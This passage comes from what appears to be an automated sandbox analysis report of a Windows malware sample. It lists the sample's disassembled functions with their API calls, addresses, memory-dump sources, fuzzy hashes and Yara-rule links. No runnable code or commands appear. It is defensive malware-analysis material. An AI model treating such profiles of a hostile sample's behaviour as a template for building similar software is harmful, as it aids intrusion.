                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                            Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            • __wsplitpath.LIBCMT ref: 0043392E
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • __wsplitpath.LIBCMT ref: 00433950
                            • __wcsicoll.LIBCMT ref: 00433974
                            • __wcsicoll.LIBCMT ref: 0043398A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                            • String ID:
                            • API String ID: 1187119602-0
                            • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                            • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                            • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                            • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                            Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                            • String ID:
                            • API String ID: 1597257046-0
                            • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                            • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                            • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                            • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                            Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                            • __malloc_crt.LIBCMT ref: 0041F5B6
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: EnvironmentStrings$Free__malloc_crt
                            • String ID:
                            • API String ID: 237123855-0
                            • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                            • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                            • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                            • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                            Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: DeleteDestroyObject$IconWindow
                            • String ID:
                            • API String ID: 3349847261-0
                            • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                            • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                            • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                            • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                            Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                            • String ID:
                            • API String ID: 2223660684-0
                            • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                            • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                            • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                            • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                            Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                            • LineTo.GDI32(?,?,?), ref: 00447326
                            • EndPath.GDI32(?), ref: 00447336
                            • StrokePath.GDI32(?), ref: 00447344
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                            • String ID:
                            • API String ID: 2783949968-0
                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                            Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                            • String ID:
                            • API String ID: 2710830443-0
                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                            Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                            Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • GetDesktopWindow.USER32 ref: 00472B63
                            • GetDC.USER32(00000000), ref: 00472B6C
                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                            • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                            • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                            • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                            Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • GetDesktopWindow.USER32 ref: 00472BB2
                            • GetDC.USER32(00000000), ref: 00472BBB
                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                            • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                            • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                            • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                            • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                            Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                            Download Yara Rule
                            APIs
                            • __getptd_noexit.LIBCMT ref: 00415150
                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                            • __freeptd.LIBCMT ref: 0041516B
                            • ExitThread.KERNEL32 ref: 00415173
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                            • String ID:
                            • API String ID: 1454798553-0
                            • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                            • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                            • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                            • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                            Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _strncmp
                            • String ID: Q\E
                            • API String ID: 909875538-2189900498
                            • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                            • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                            • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                            • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                            Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                            Download Yara Rule
                            APIs
                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                            • String ID: AutoIt3GUI$Container
                            • API String ID: 2652923123-3941886329
                            • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                            • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                            • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                            • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                            Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove_strncmp
                            • String ID: U$\
                            • API String ID: 2666721431-100911408
                            • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                            • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                            • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                            • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                            Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • __wcsnicmp.LIBCMT ref: 00467288
                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                            • String ID: LPT
                            • API String ID: 3035604524-1350329615
